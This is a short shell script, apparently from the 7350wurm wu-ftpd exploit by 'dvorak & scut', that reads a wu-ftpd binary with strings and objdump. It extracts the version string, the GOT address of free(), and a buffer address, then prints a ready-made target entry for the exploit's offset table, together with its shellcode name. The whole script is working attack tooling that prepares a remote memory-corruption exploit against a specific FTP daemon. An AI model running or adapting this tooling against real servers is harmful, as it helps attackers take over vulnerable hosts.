#!/bin/sh

# 7350wurm offset finder
# dvorak & scut

check_util ()
{
	for util in $*; do
		echo -n "checking for $util: "
		if ! which $util; then
			echo "not found, aborting"
			exit
		fi
	done
}

echo "7350wurm exploit offset finder"
echo

if [ $# != 1 ]; then
	echo "usage: $0 /path/to/wuftpd/binary"
	echo
	exit
fi;


check_util strings objdump

echo

versionstring=`strings $1 | grep ^Version`
echo $versionstring

freeaddr=`objdump -R $1 | grep free$ | grep -v glob | awk '{print $1}'`
echo $freeaddr

strncasecmpaddr=`objdump -T $1 | grep strncasecmp | awk '{print $1}' | \
	sed "s/^0*//g"`
echo # $strncasecmpaddr

tmpaddr=`objdump --disassemble $1 2>/dev/null | grep -B3 $strncasecmpaddr | \
	grep "\\$0xa" | awk '{print $1}' | cut -d ':' -f1`
echo # found at $tmpaddr
tmpreg=`objdump --disassemble $1 | grep -A3 "^ $tmpaddr" | head -3 | \
	tail -1 | cut -d '%' -f2`
echo # $tmpreg
cbufaddr=`objdump --disassemble $1 | grep -B200 "^ $tmpaddr" | grep $tmpreg | \
	grep "\\$0x80" | head -1 | cut -d '$' -f2- | cut -c -9`

echo "target:"
echo
echo '{ "insert exact dist, rpm, .. here",'
echo \"$versionstring\",
echo 'x86_wrx, sizeof (x86_wrx) - 1,'
echo 0x$freeaddr, $cbufaddr },
echo